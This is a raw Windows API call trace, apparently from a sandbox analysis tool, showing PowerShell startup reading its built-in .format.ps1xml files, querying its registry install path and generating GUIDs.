	[0629.890] ReadFile (in: hFile=0x2e4, lpBuffer=0x2cf35a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2cf35a8*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.890] ReadFile (in: hFile=0x2e4, lpBuffer=0x2cf35a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2cf35a8*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.890] ReadFile (in: hFile=0x2e4, lpBuffer=0x2cf35a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2cf35a8*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.891] ReadFile (in: hFile=0x2e4, lpBuffer=0x2cf35a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2cf35a8*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.891] ReadFile (in: hFile=0x2e4, lpBuffer=0x2cf35a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2cf35a8*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.891] ReadFile (in: hFile=0x2e4, lpBuffer=0x2cf35a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2cf35a8*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.892] ReadFile (in: hFile=0x2e4, lpBuffer=0x2cf35a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2cf35a8*, lpNumberOfBytesRead=0x16cef8*=0xbce, lpOverlapped=0x0) returned 1
	[0629.892] ReadFile (in: hFile=0x2e4, lpBuffer=0x2cf2cde, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2cde*, lpNumberOfBytesRead=0x16cef8*=0x0, lpOverlapped=0x0) returned 1
	[0629.892] ReadFile (in: hFile=0x2e4, lpBuffer=0x2cf35a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2cf35a8*, lpNumberOfBytesRead=0x16cef8*=0x0, lpOverlapped=0x0) returned 1
	[0629.892] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cf88 | out: phkResult=0x16cf88*=0x2e4) returned 0x0
	[0629.893] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16cf0c, lpData=0x0, lpcbData=0x16cf08*=0x0 | out: lpType=0x16cf0c*=0x1, lpData=0x0, lpcbData=0x16cf08*=0x56) returned 0x0
	[0629.893] CoTaskMemAlloc (cb=0x5a) returned 0x26f2b0
	[0629.893] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16cedc, lpData=0x26f2b0, lpcbData=0x16ced8*=0x56 | out: lpType=0x16cedc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16ced8*=0x56) returned 0x0
	[0629.893] CoTaskMemFree (pv=0x26f2b0) 
	[0629.893] RegCloseKey (hKey=0x2e4) returned 0x0
	[0629.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0629.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0629.897] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x53130ea9, Data2=0x2ba0, Data3=0x4202, Data4=([0]=0x89, [1]=0x5c, [2]=0x55, [3]=0x5d, [4]=0x8b, [5]=0x7d, [6]=0x75, [7]=0xe9))) returned 0x0
	[0629.898] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xf10c364b, Data2=0x6c92, Data3=0x4adf, Data4=([0]=0x91, [1]=0x96, [2]=0x98, [3]=0x2d, [4]=0x80, [5]=0xa9, [6]=0xa3, [7]=0x89))) returned 0x0
	[0629.898] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x60be4981, Data2=0x950f, Data3=0x4aef, Data4=([0]=0x94, [1]=0x6d, [2]=0x90, [3]=0x28, [4]=0xd9, [5]=0xa0, [6]=0xdd, [7]=0xe9))) returned 0x0
	[0629.898] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x5c4fde93, Data2=0x57ef, Data3=0x418a, Data4=([0]=0xa6, [1]=0xee, [2]=0xaf, [3]=0xf1, [4]=0x18, [5]=0xbf, [6]=0x67, [7]=0x9b))) returned 0x0
	[0629.899] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x7b3d5155, Data2=0xe0ae, Data3=0x4f44, Data4=([0]=0xa4, [1]=0x41, [2]=0x4a, [3]=0x69, [4]=0x66, [5]=0x63, [6]=0x53, [7]=0xc3))) returned 0x0
	[0629.899] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x6f7c0279, Data2=0x66b8, Data3=0x42b7, Data4=([0]=0xbd, [1]=0x9b, [2]=0xa, [3]=0xf1, [4]=0x8a, [5]=0x41, [6]=0xef, [7]=0x4e))) returned 0x0
	[0629.900] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xb6744fc4, Data2=0x422, Data3=0x41d7, Data4=([0]=0xb0, [1]=0x77, [2]=0xcc, [3]=0xdb, [4]=0x49, [5]=0xae, [6]=0xf8, [7]=0xf5))) returned 0x0
	[0629.901] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x3b65be59, Data2=0x5c5, Data3=0x4baf, Data4=([0]=0x97, [1]=0xe1, [2]=0x20, [3]=0xce, [4]=0x7f, [5]=0x58, [6]=0x4, [7]=0xec))) returned 0x0
	[0629.901] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xc2f40fcf, Data2=0x6bdb, Data3=0x4744, Data4=([0]=0xbf, [1]=0xa7, [2]=0xf0, [3]=0x32, [4]=0xa, [5]=0x36, [6]=0x47, [7]=0xeb))) returned 0x0
	[0629.902] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x367a0831, Data2=0xfe32, Data3=0x486e, Data4=([0]=0xb8, [1]=0x76, [2]=0x3d, [3]=0xa8, [4]=0x96, [5]=0x56, [6]=0xc2, [7]=0x7a))) returned 0x0
	[0629.902] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x482d481a, Data2=0x1d46, Data3=0x48c8, Data4=([0]=0x86, [1]=0x28, [2]=0x44, [3]=0xf9, [4]=0x88, [5]=0x7d, [6]=0x3, [7]=0x10))) returned 0x0
	[0629.902] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xbda59093, Data2=0x8dbd, Data3=0x47cf, Data4=([0]=0x80, [1]=0x7d, [2]=0x5c, [3]=0x9d, [4]=0x49, [5]=0x26, [6]=0x99, [7]=0x53))) returned 0x0
	[0629.903] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x5ebf3187, Data2=0xeca2, Data3=0x4c1b, Data4=([0]=0xb6, [1]=0xd4, [2]=0x28, [3]=0xc4, [4]=0x3e, [5]=0xbf, [6]=0xbc, [7]=0x3f))) returned 0x0
	[0629.903] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x451f458d, Data2=0x285f, Data3=0x4543, Data4=([0]=0x97, [1]=0x4f, [2]=0x9, [3]=0x54, [4]=0x2a, [5]=0xfb, [6]=0xe1, [7]=0xf))) returned 0x0
	[0629.903] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xc073bda2, Data2=0x1333, Data3=0x4d73, Data4=([0]=0x94, [1]=0x11, [2]=0x58, [3]=0xfb, [4]=0x5f, [5]=0xf0, [6]=0xd1, [7]=0xea))) returned 0x0
	[0629.903] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x5f47db2d, Data2=0xf2fc, Data3=0x4491, Data4=([0]=0x8c, [1]=0x7b, [2]=0xdb, [3]=0xe, [4]=0xb2, [5]=0x83, [6]=0xda, [7]=0x5b))) returned 0x0
	[0629.903] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xcba306e8, Data2=0xa153, Data3=0x4cdf, Data4=([0]=0x9b, [1]=0x85, [2]=0xd6, [3]=0x76, [4]=0x87, [5]=0xb4, [6]=0xc5, [7]=0x5d))) returned 0x0
	[0629.903] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xea9e0715, Data2=0x3803, Data3=0x4e34, Data4=([0]=0x8f, [1]=0xd7, [2]=0xbe, [3]=0x27, [4]=0x69, [5]=0x7a, [6]=0x89, [7]=0x97))) returned 0x0
	[0629.903] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xfeec6c4b, Data2=0xf4ad, Data3=0x4e00, Data4=([0]=0x8b, [1]=0x1e, [2]=0x76, [3]=0x82, [4]=0x1d, [5]=0x11, [6]=0x7c, [7]=0x2a))) returned 0x0
	[0629.904] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x9d2f198, Data2=0xbd49, Data3=0x4f90, Data4=([0]=0xbd, [1]=0x68, [2]=0xcd, [3]=0xf0, [4]=0x66, [5]=0xc4, [6]=0xf2, [7]=0x15))) returned 0x0
	[0629.904] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xa9689a04, Data2=0xb6ed, Data3=0x45d1, Data4=([0]=0x88, [1]=0xb8, [2]=0x6c, [3]=0x12, [4]=0x8f, [5]=0xc1, [6]=0x3c, [7]=0x22))) returned 0x0
	[0629.904] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xd04def1b, Data2=0xf851, Data3=0x427d, Data4=([0]=0x96, [1]=0x75, [2]=0xf5, [3]=0xf8, [4]=0x3e, [5]=0x63, [6]=0xee, [7]=0x59))) returned 0x0
	[0629.904] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xd08b9111, Data2=0xe2d5, Data3=0x4676, Data4=([0]=0x81, [1]=0x5f, [2]=0x84, [3]=0xb2, [4]=0xa, [5]=0x3f, [6]=0x3c, [7]=0x8e))) returned 0x0
	[0629.904] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xd51e87eb, Data2=0xef18, Data3=0x4995, Data4=([0]=0x96, [1]=0x55, [2]=0x8d, [3]=0x1a, [4]=0x1f, [5]=0xed, [6]=0xaa, [7]=0xd0))) returned 0x0
	[0629.904] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x27677b2f, Data2=0x3ddd, Data3=0x415e, Data4=([0]=0x95, [1]=0x99, [2]=0xaf, [3]=0x73, [4]=0xd0, [5]=0x8e, [6]=0x6d, [7]=0x1))) returned 0x0
	[0629.904] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xe84255bc, Data2=0x76d7, Data3=0x4b96, Data4=([0]=0xa5, [1]=0xb2, [2]=0xe, [3]=0xef, [4]=0x9b, [5]=0xd2, [6]=0xa6, [7]=0x8a))) returned 0x0
	[0629.905] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xf7fd95ed, Data2=0x1759, Data3=0x467a, Data4=([0]=0x8e, [1]=0x30, [2]=0xb3, [3]=0x17, [4]=0xc7, [5]=0x5e, [6]=0x94, [7]=0x27))) returned 0x0
	[0629.905] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x6c5a912b, Data2=0x76d1, Data3=0x41a6, Data4=([0]=0xa9, [1]=0xd7, [2]=0x3e, [3]=0xec, [4]=0x24, [5]=0xb7, [6]=0xd3, [7]=0xa8))) returned 0x0
	[0629.905] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xede90a62, Data2=0xa2de, Data3=0x4745, Data4=([0]=0xaf, [1]=0x2c, [2]=0xbf, [3]=0xdb, [4]=0x81, [5]=0xe1, [6]=0x82, [7]=0x71))) returned 0x0
	[0629.905] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xae363cfb, Data2=0x8f5b, Data3=0x4f01, Data4=([0]=0xbc, [1]=0x64, [2]=0xcf, [3]=0xc7, [4]=0x6f, [5]=0x9e, [6]=0x65, [7]=0x9d))) returned 0x0
	[0629.905] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xdadb34d2, Data2=0xd9cc, Data3=0x40b8, Data4=([0]=0xbb, [1]=0x58, [2]=0xc1, [3]=0xbb, [4]=0x7b, [5]=0xea, [6]=0x4b, [7]=0xb2))) returned 0x0
	[0629.905] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xd6ee06c5, Data2=0x2981, Data3=0x4a3c, Data4=([0]=0x82, [1]=0x9f, [2]=0xb1, [3]=0x4f, [4]=0x8f, [5]=0xfe, [6]=0xd3, [7]=0x24))) returned 0x0
	[0629.905] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xa03a8175, Data2=0x234f, Data3=0x49cb, Data4=([0]=0x96, [1]=0xba, [2]=0x52, [3]=0x65, [4]=0xae, [5]=0x8, [6]=0xb7, [7]=0xe1))) returned 0x0
	[0629.905] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xbd5bcb8e, Data2=0x9624, Data3=0x411d, Data4=([0]=0xa4, [1]=0x68, [2]=0xbe, [3]=0x25, [4]=0x0, [5]=0xcd, [6]=0x42, [7]=0x25))) returned 0x0
	[0629.906] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xff48b0a4, Data2=0x3ecc, Data3=0x466c, Data4=([0]=0xa0, [1]=0xd2, [2]=0xc3, [3]=0x3c, [4]=0xaa, [5]=0xf2, [6]=0x13, [7]=0xe1))) returned 0x0
	[0629.906] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x128437fb, Data2=0x2114, Data3=0x4429, Data4=([0]=0x9a, [1]=0x96, [2]=0xe, [3]=0x1c, [4]=0xd9, [5]=0x71, [6]=0x12, [7]=0xf2))) returned 0x0
	[0629.906] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x33f7bafa, Data2=0x1cb9, Data3=0x4d50, Data4=([0]=0xbe, [1]=0x17, [2]=0xff, [3]=0x36, [4]=0xe4, [5]=0xde, [6]=0x9d, [7]=0xf9))) returned 0x0
	[0629.907] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2e4
	[0629.907] GetFileType (hFile=0x2e4) returned 0x1
	[0629.907] SetErrorMode (uMode=0x1) returned 0x1
	[0629.907] GetFileType (hFile=0x2e4) returned 0x1
	[0629.907] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e03b90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e03b90*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.919] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e03b90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e03b90*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.920] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e03b90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e03b90*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.920] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e03b90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e03b90*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.920] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e03b90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e03b90*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.921] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e03b90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e03b90*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.921] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e03b90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e03b90*, lpNumberOfBytesRead=0x16cef8*=0x119, lpOverlapped=0x0) returned 1
	[0629.921] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e03b90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e03b90*, lpNumberOfBytesRead=0x16cef8*=0x0, lpOverlapped=0x0) returned 1
	[0629.922] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cf88 | out: phkResult=0x16cf88*=0x2e4) returned 0x0
	[0629.922] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16cf0c, lpData=0x0, lpcbData=0x16cf08*=0x0 | out: lpType=0x16cf0c*=0x1, lpData=0x0, lpcbData=0x16cf08*=0x56) returned 0x0
	[0629.922] CoTaskMemAlloc (cb=0x5a) returned 0x26f2b0
	[0629.922] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16cedc, lpData=0x26f2b0, lpcbData=0x16ced8*=0x56 | out: lpType=0x16cedc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16ced8*=0x56) returned 0x0
	[0629.922] CoTaskMemFree (pv=0x26f2b0) 
	[0629.922] RegCloseKey (hKey=0x2e4) returned 0x0
	[0629.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0629.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0629.923] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x2a9b9ebd, Data2=0x6be9, Data3=0x422d, Data4=([0]=0x9c, [1]=0x85, [2]=0xa5, [3]=0x99, [4]=0xf4, [5]=0xa3, [6]=0xd3, [7]=0x4f))) returned 0x0
	[0629.924] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xa68e6d1, Data2=0xe69b, Data3=0x4e2a, Data4=([0]=0x91, [1]=0x89, [2]=0x90, [3]=0xb0, [4]=0xf5, [5]=0xd1, [6]=0xd8, [7]=0xb7))) returned 0x0
	[0629.924] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xb6ccb4b5, Data2=0xbdf0, Data3=0x4db9, Data4=([0]=0x83, [1]=0xea, [2]=0xdb, [3]=0xa, [4]=0x19, [5]=0x3f, [6]=0xcb, [7]=0x3d))) returned 0x0
	[0629.924] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xdbdc923f, Data2=0xa07a, Data3=0x4857, Data4=([0]=0xa8, [1]=0xb2, [2]=0xc0, [3]=0x81, [4]=0xe1, [5]=0x4, [6]=0x3, [7]=0xf8))) returned 0x0
	[0629.925] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2e4
	[0629.925] GetFileType (hFile=0x2e4) returned 0x1
	[0629.925] SetErrorMode (uMode=0x1) returned 0x1
	[0629.925] GetFileType (hFile=0x2e4) returned 0x1
	[0629.925] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.937] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.937] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.938] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.938] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.939] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.939] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.939] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.944] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.944] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.945] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.945] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.945] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.946] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.946] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.948] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.951] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.952] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.952] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.952] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.953] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.953] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
